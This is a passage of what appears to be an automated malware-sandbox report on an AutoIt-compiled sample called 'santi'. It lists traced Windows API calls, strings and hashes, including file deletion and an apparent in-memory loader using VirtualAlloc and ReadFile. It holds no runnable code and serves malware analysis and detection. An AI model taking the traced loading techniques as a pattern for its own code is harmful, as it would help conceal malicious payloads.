                                                                • Opcode ID: 04c406522037df001ea76c57c79e40a820c4948a9b6c11c1edb3f1320618509e
                                                                • Instruction ID: 6ac8c32a119a483493bcce47a3c3cb4d324e46221a52cd6ce965b01ebdeccc6e
                                                                • Opcode Fuzzy Hash: 04c406522037df001ea76c57c79e40a820c4948a9b6c11c1edb3f1320618509e
                                                                • Instruction Fuzzy Hash: 082198B5E00219AFDB02DFA5EC49BCEBBB8FB09704F04821AF915A62A0D7B545448F91

                                                                Control-flow Graph

                                                                APIs
                                                                  • Part of subcall function 0032BDB4: __time64.LIBCMT ref: 0032BDBE
                                                                  • Part of subcall function 002E4517: _fseek.LIBCMT ref: 002E452F
                                                                • __wsplitpath.LIBCMT ref: 0032C083
                                                                  • Part of subcall function 00301DFC: __wsplitpath_helper.LIBCMT ref: 00301E3C
                                                                • _wcscpy.LIBCMT ref: 0032C096
                                                                • _wcscat.LIBCMT ref: 0032C0A9
                                                                • __wsplitpath.LIBCMT ref: 0032C0CE
                                                                • _wcscat.LIBCMT ref: 0032C0E4
                                                                • _wcscat.LIBCMT ref: 0032C0F7
                                                                • _wcscmp.LIBCMT ref: 0032C03E
                                                                  • Part of subcall function 0032C56D: _wcscmp.LIBCMT ref: 0032C65D
                                                                  • Part of subcall function 0032C56D: _wcscmp.LIBCMT ref: 0032C670
                                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0032C2A1
                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0032C338
                                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0032C34E
                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0032C35F
                                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0032C371
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                • String ID:
                                                                • API String ID: 2378138488-0
                                                                • Opcode ID: 33598aa40b2efd8925646eacbd9998c5f5b75f3bb6fc35a964959448129c7984
                                                                • Instruction ID: acd284db1f3c82f7eebd08e69a86d575d780b01c62d9e158e2a62177ee6b7268
                                                                • Opcode Fuzzy Hash: 33598aa40b2efd8925646eacbd9998c5f5b75f3bb6fc35a964959448129c7984
                                                                • Instruction Fuzzy Hash: C0C12DB1E10229AFDF12DF95DC81EDEB7BDAF49300F1040AAF609EA151DB709A448F61

                                                                Control-flow Graph

                                                                control_flow_graph 957 2e3742-2e3762 959 2e3764-2e3767 957->959 960 2e37c2-2e37c4 957->960 962 2e37c8 959->962 963 2e3769-2e3770 959->963 960->959 961 2e37c6 960->961 964 2e37ab-2e37b3 DefWindowProcW 961->964 965 2e37ce-2e37d1 962->965 966 351e00-351e2e call 2e2ff6 call 2fe312 962->966 967 2e382c-2e3834 PostQuitMessage 963->967 968 2e3776-2e377b 963->968 975 2e37b9-2e37bf 964->975 969 2e37f6-2e381d SetTimer RegisterWindowMessageW 965->969 970 2e37d3-2e37d4 965->970 1004 351e33-351e3a 966->1004 974 2e37f2-2e37f4 967->974 972 351e88-351e9c call 324ddd 968->972 973 2e3781-2e3783 968->973 969->974 979 2e381f-2e382a CreatePopupMenu 969->979 976 2e37da-2e37ed KillTimer call 2e3847 call 2e390f 970->976 977 351da3-351da6 970->977 972->974 998 351ea2 972->998 980 2e3789-2e378e 973->980 981 2e3836-2e3840 call 2feb83 973->981 974->975 976->974 983 351ddc-351dfb MoveWindow 977->983 984 351da8-351daa 977->984 979->974 987 351e6d-351e74 980->987 988 2e3794-2e3799 980->988 999 2e3845 981->999 983->974 991 351dac-351daf 984->991 992 351dcb-351dd7 SetFocus 984->992 987->964 994 351e7a-351e83 call 31a5f3 987->994 996 2e379f-2e37a5 988->996 997 351e58-351e68 call 3255bd 988->997 991->996 1000 351db5-351dc6 call 2e2ff6 991->1000 992->974 994->964 996->964 996->1004 997->974 998->964 999->974 1000->974 1004->964 1008 351e40-351e53 call 2e3847 call 2e4ffc 1004->1008 1008->964
                                                                APIs
                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 002E37B3
                                                                • KillTimer.USER32(?,00000001), ref: 002E37DD
                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002E3800
                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002E380B
                                                                • CreatePopupMenu.USER32 ref: 002E381F
                                                                • PostQuitMessage.USER32(00000000), ref: 002E382E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                • String ID: TaskbarCreated
                                                                • API String ID: 129472671-2362178303
                                                                • Opcode ID: ea801064689636b243fe492c3776fdf313136de3204b96e5a8a0b2f532c82837
                                                                • Instruction ID: 01436a01b84685b57e2442ea1d7ff96ff74089c35e4bb19985f3ee78a952136a
                                                                • Opcode Fuzzy Hash: ea801064689636b243fe492c3776fdf313136de3204b96e5a8a0b2f532c82837
                                                                • Instruction Fuzzy Hash: 5D4169F52B41D6ABDB12DF2ADC4EF7A7A99FB01303F800114F902D30A1CBA09E608761

                                                                Control-flow Graph

                                                                APIs
                                                                • GetSysColorBrush.USER32(0000000F), ref: 002E3E79
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 002E3E88
                                                                • LoadIconW.USER32(00000063), ref: 002E3E9E
                                                                • LoadIconW.USER32(000000A4), ref: 002E3EB0
                                                                • LoadIconW.USER32(000000A2), ref: 002E3EC2
                                                                  • Part of subcall function 002E4024: LoadImageW.USER32(002E0000,00000063,00000001,00000010,00000010,00000000), ref: 002E4048
                                                                • RegisterClassExW.USER32(?), ref: 002E3F30
                                                                  • Part of subcall function 002E3F53: GetSysColorBrush.USER32(0000000F), ref: 002E3F86
                                                                  • Part of subcall function 002E3F53: RegisterClassExW.USER32(00000030), ref: 002E3FB0
                                                                  • Part of subcall function 002E3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002E3FC1
                                                                  • Part of subcall function 002E3F53: InitCommonControlsEx.COMCTL32(?), ref: 002E3FDE
                                                                  • Part of subcall function 002E3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002E3FEE
                                                                  • Part of subcall function 002E3F53: LoadIconW.USER32(000000A9), ref: 002E4004
                                                                  • Part of subcall function 002E3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002E4013
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                • String ID: #$0$AutoIt v3
                                                                • API String ID: 423443420-4155596026
                                                                • Opcode ID: 3b2108d440e26e3f211fe4188a09e159b0992656303dae80cdb3c651ac727916
                                                                • Instruction ID: 0158b719cd85fed6ec40cf2d895148de0a9d06fc298d97b55e178838ab6142f0
                                                                • Opcode Fuzzy Hash: 3b2108d440e26e3f211fe4188a09e159b0992656303dae80cdb3c651ac727916
                                                                • Instruction Fuzzy Hash: 642177B4E44314AFCB42DFA9EC45A9ABFF9FB49314F00411AE604A32A0D7754540CF91

                                                                Control-flow Graph

                                                                control_flow_graph 1021 30acb3-30ace0 call 306ac0 call 307cf4 call 306986 1028 30ace2-30acf8 call 30e880 1021->1028 1029 30acfd-30ad02 1021->1029 1035 30af52-30af57 call 306b05 1028->1035 1031 30ad08-30ad0f 1029->1031 1033 30ad11-30ad40 1031->1033 1034 30ad42-30ad51 GetStartupInfoW 1031->1034 1033->1031 1036 30ae80-30ae86 1034->1036 1037 30ad57-30ad5c 1034->1037 1039 30af44-30af50 call 30af58 1036->1039 1040 30ae8c-30ae9d 1036->1040 1037->1036 1038 30ad62-30ad79 1037->1038 1042 30ad80-30ad83 1038->1042 1043 30ad7b-30ad7d 1038->1043 1039->1035 1044 30aeb2-30aeb8 1040->1044 1045 30ae9f-30aea2 1040->1045 1048 30ad86-30ad8c 1042->1048 1043->1042 1050 30aeba-30aebd 1044->1050 1051 30aebf-30aec6 1044->1051 1045->1044 1049 30aea4-30aead 1045->1049 1053 30adae-30adb6 1048->1053 1054 30ad8e-30ad9f call 306986 1048->1054 1055 30af3e-30af3f 1049->1055 1056 30aec9-30aed5 GetStdHandle 1050->1056 1051->1056 1058 30adb9-30adbb 1053->1058 1066 30ae33-30ae3a 1054->1066 1067 30ada5-30adab 1054->1067 1055->1036 1059 30aed7-30aed9 1056->1059 1060 30af1c-30af32 1056->1060 1058->1036 1063 30adc1-30adc6 1058->1063 1059->1060 1064 30aedb-30aee4 GetFileType 1059->1064 1060->1055 1062 30af34-30af37 1060->1062 1062->1055 1068 30ae20-30ae31 1063->1068 1069 30adc8-30adcb 1063->1069 1064->1060 1065 30aee6-30aef0 1064->1065 1070 30aef2-30aef8 1065->1070 1071 30aefa-30aefd 1065->1071 1072 30ae40-30ae4e 1066->1072 1067->1053 1068->1058 1069->1068 1073 30adcd-30add1 1069->1073 1074 30af05 1070->1074 1075 30af08-30af1a InitializeCriticalSectionAndSpinCount 1071->1075 1076 30aeff-30af03 1071->1076 1077 30ae50-30ae72 1072->1077 1078 30ae74-30ae7b 1072->1078 1073->1068 1079 30add3-30add5 1073->1079 1074->1075 1075->1055 1076->1074 1077->1072 1078->1048 1080 30ade5-30ae1a InitializeCriticalSectionAndSpinCount 1079->1080 1081 30add7-30ade3 GetFileType 1079->1081 1082 30ae1d 1080->1082 1081->1080 1081->1082 1082->1068
                                                                APIs
                                                                • __lock.LIBCMT ref: 0030ACC1
                                                                  • Part of subcall function 00307CF4: __mtinitlocknum.LIBCMT ref: 00307D06
                                                                  • Part of subcall function 00307CF4: EnterCriticalSection.KERNEL32(00000000,?,00307ADD,0000000D), ref: 00307D1F
                                                                • __calloc_crt.LIBCMT ref: 0030ACD2
                                                                  • Part of subcall function 00306986: __calloc_impl.LIBCMT ref: 00306995
                                                                  • Part of subcall function 00306986: Sleep.KERNEL32(00000000,000003BC,002FF507,?,0000000E), ref: 003069AC
                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 0030ACED
                                                                • GetStartupInfoW.KERNEL32(?,00396E28,00000064,00305E91,00396C70,00000014), ref: 0030AD46
                                                                • __calloc_crt.LIBCMT ref: 0030AD91
                                                                • GetFileType.KERNEL32(00000001), ref: 0030ADD8
                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0030AE11
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                • String ID:
                                                                • API String ID: 1426640281-0
                                                                • Opcode ID: ffca43fd220f4f27c02a4a8304c4007c45e9e819af2f1b1e31abcda3b578b912
                                                                • Instruction ID: 2e691e651943e6e9740bde9c191262bc99e27e734b6e1fefcbd6c717366a835a
                                                                • Opcode Fuzzy Hash: ffca43fd220f4f27c02a4a8304c4007c45e9e819af2f1b1e31abcda3b578b912
                                                                • Instruction Fuzzy Hash: 6281F571D06B458FDB16CF68E8605AEBBF4AF4A320F24425DD4A6AB3D1C7349803CB56

                                                                Control-flow Graph (legend: Executed / Not Executed; rendered graph and edge list not recoverable from the extracted text): basic blocks e17580-e17882 calling e14f70, e18490, CreateFileW, VirtualAlloc, ReadFile, e186e0, e184f0, CloseHandle and VirtualFree
                                                                APIs
                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E17651
                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E17877
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateFileFreeVirtual
                                                                • String ID: k~
                                                                • API String ID: 204039940-3608382517
                                                                • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                • Instruction ID: 659f8d143e24182c460e5a387bda700ff747361fbd711b195a6f6939de89829c
                                                                • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                • Instruction Fuzzy Hash: 37A14674E04209EBDB14CFA4C898BEEBBB5FF48705F209159E151BB280D7759A80CFA4

                                                                Control-flow Graph (legend: Executed / Not Executed; rendered graph and edge list not recoverable from the extracted text): basic blocks 2e49fb-2e4a2f and 3541cc-35424f calling 2ebcce, RegOpenKeyExW, RegQueryValueExW (twice), 2ff4ea, 2e47b7, 2e6a63, 2e47e2 and RegCloseKey
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 002E4A1D
                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003541DB
                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0035421A
                                                                • RegCloseKey.ADVAPI32(?), ref: 00354249
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: QueryValue$CloseOpen
                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                • API String ID: 1586453840-614718249
                                                                • Opcode ID: 652b5c5b52b244f6f5a8dac02bcb2ee7f77a0533125df4da268135ec6f80a09b
                                                                • Instruction ID: a07900e5e91a8fb1a6dd31bfded395d144445e2eafa762bf0bdf8c4f2bda848e
                                                                • Opcode Fuzzy Hash: 652b5c5b52b244f6f5a8dac02bcb2ee7f77a0533125df4da268135ec6f80a09b
                                                                • Instruction Fuzzy Hash: 8C11AF71A50109BFEB06ABA4CD86DFF7BBCEF04344F004068F506D21A1EAB09E41DB50

                                                                Control-flow Graph (legend: Executed / Not Executed; rendered graph not recoverable from the extracted text): single basic block 2e36b8-2e3728 calling CreateWindowExW (twice) and ShowWindow (twice)
                                                                APIs
                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002E36E6
                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 002E3707
                                                                • ShowWindow.USER32(00000000,?,?,?,?,002E3AA3,?), ref: 002E371B
                                                                • ShowWindow.USER32(00000000,?,?,?,?,002E3AA3,?), ref: 002E3724
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$CreateShow
                                                                • String ID: AutoIt v3$edit
                                                                • API String ID: 1584632944-3779509399
                                                                • Opcode ID: ba050a2e33d3be39c1e98e99dc106ee27d5abcef354cd3bd7bd2c6576bd1df36
                                                                • Instruction ID: 48953dbdcd696052da821d50c322711f956e3b78de47a1d0b4fb5f244dcd61be
                                                                • Opcode Fuzzy Hash: ba050a2e33d3be39c1e98e99dc106ee27d5abcef354cd3bd7bd2c6576bd1df36
                                                                • Instruction Fuzzy Hash: 3DF0FE75A402E07AE7729B57AC08E773E7DE7C7F24F00401FFA08A21B0C5650895DAB1

                                                                Control-flow Graph (legend: Executed / Not Executed; rendered graph and edge list not recoverable from the extracted text): basic blocks e17320-e1753b calling e14f70, e17210, CreateFileW, VirtualAlloc, ReadFile, e17250, e16210, e172a0 and ExitProcess
                                                                APIs
                                                                  • Part of subcall function 00E17210: Sleep.KERNELBASE(000001F4), ref: 00E17221
                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E17475
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293967050.0000000000E14000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E14000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e14000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateFileSleep
                                                                • String ID: WBBCQJX6QCW3J16M7PZT
                                                                • API String ID: 2694422964-2256965403
                                                                • Opcode ID: 2aac2944cbe036dbcb6e09ef5eae9c7d82e835dbea803b51e492353748faf780
                                                                • Instruction ID: d839e7bd0c6abb065c554d6d1eb2eb94894e2d43a0b5922048bd8e7688839d7a
                                                                • Opcode Fuzzy Hash: 2aac2944cbe036dbcb6e09ef5eae9c7d82e835dbea803b51e492353748faf780
                                                                • Instruction Fuzzy Hash: 6A619170E18248DBEF11DBA4C854BDEBBB5AF18704F005199E648BB2C1D7BA0B45CBA5
                                                                APIs
                                                                  • Part of subcall function 002E5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003A1148,?,002E61FF,?,00000000,00000001,00000000), ref: 002E5392
                                                                  • Part of subcall function 002E49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 002E4A1D
                                                                • _wcscat.LIBCMT ref: 00352D80
                                                                • _wcscat.LIBCMT ref: 00352DB5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscat$FileModuleNameOpen
                                                                • String ID: 8!:$\$\Include\
                                                                • API String ID: 3592542968-1415739923
                                                                • Opcode ID: d92288e7d57b7b992cf7db20ae3f4321b1ed9e18169cb9203a41bcf701322d69
                                                                • Instruction ID: f59160a691c920a703a88f9dd0d8985f9f791a8ad25885c7a21b880fbac1aa54
                                                                • Opcode Fuzzy Hash: d92288e7d57b7b992cf7db20ae3f4321b1ed9e18169cb9203a41bcf701322d69
                                                                • Instruction Fuzzy Hash: 595150764143809FC716EF5AD99189BB7F8FF5A300F90452EF64987261EB709908CF52
                                                                APIs
                                                                  • Part of subcall function 002E41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002E39FE,?,00000001), ref: 002E41DB
                                                                • _free.LIBCMT ref: 003536B7
                                                                • _free.LIBCMT ref: 003536FE
                                                                  • Part of subcall function 002EC833: __wsplitpath.LIBCMT ref: 002EC93E
                                                                  • Part of subcall function 002EC833: _wcscpy.LIBCMT ref: 002EC953
                                                                  • Part of subcall function 002EC833: _wcscat.LIBCMT ref: 002EC968
                                                                  • Part of subcall function 002EC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 002EC978
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                • API String ID: 805182592-1757145024
                                                                • Opcode ID: 45a1a0627f91905922ecbe299109358ad18d19219afc98061c5ea979906bf15a
                                                                • Instruction ID: 767111f1027613698f64527f46b00d23c694b9ef3c930f7b24959d9ca02ed978
                                                                • Opcode Fuzzy Hash: 45a1a0627f91905922ecbe299109358ad18d19219afc98061c5ea979906bf15a
                                                                • Instruction Fuzzy Hash: 1B919271920259AFCF06EFA5CC91DEEB7B4BF09350F50442AF816AB2A1DB349A15CF50
                                                                APIs
                                                                • _memset.LIBCMT ref: 00353725
                                                                • GetOpenFileNameW.COMDLG32 ref: 0035376F
                                                                  • Part of subcall function 002E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002E53B1,?,?,002E61FF,?,00000000,00000001,00000000), ref: 002E662F
                                                                  • Part of subcall function 002E40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002E40C6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Name$Path$FileFullLongOpen_memset
                                                                • String ID: X$t39
                                                                • API String ID: 3777226403-428304074
                                                                • Opcode ID: 94275b29bf211da36af89b7e8374e7d509300c8931a0d002e71e59c194c83a2c
                                                                • Instruction ID: 7ed9831631bbc35ff45a2f33335d89baa64e4307f61a708a290920c4b8d27cce
                                                                • Opcode Fuzzy Hash: 94275b29bf211da36af89b7e8374e7d509300c8931a0d002e71e59c194c83a2c
                                                                • Instruction Fuzzy Hash: 4A21A871A201989FCF12EFD5C845BDE7BFC9F59304F404059E405AB241DBF45A898F65
                                                                APIs
                                                                • __getstream.LIBCMT ref: 003034FE
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00303539
                                                                • __wopenfile.LIBCMT ref: 00303549
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                • String ID: <G
                                                                • API String ID: 1820251861-2138716496
                                                                • Opcode ID: e8d2eea501d789c6418a51e0e88863f4532daddc5c8552b18a0ace295c932bb8
                                                                • Instruction ID: 0b6e4c3597add50bbb119d523125f6eb0e7b4785c729abc6a1d18dc1e300c578
                                                                • Opcode Fuzzy Hash: e8d2eea501d789c6418a51e0e88863f4532daddc5c8552b18a0ace295c932bb8
                                                                • Instruction Fuzzy Hash: 2A110670E032069BEB63BF768C6266E37A8AF05350B158925E815CF2D1EB30CA1197A1
                                                                APIs
                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002FD28B,SwapMouseButtons,00000004,?), ref: 002FD2BC
                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,002FD28B,SwapMouseButtons,00000004,?,?,?,?,002FC865), ref: 002FD2DD
                                                                • RegCloseKey.KERNELBASE(00000000,?,?,002FD28B,SwapMouseButtons,00000004,?,?,?,?,002FC865), ref: 002FD2FF
                                                                Strings
                                                                Memory Dump Source
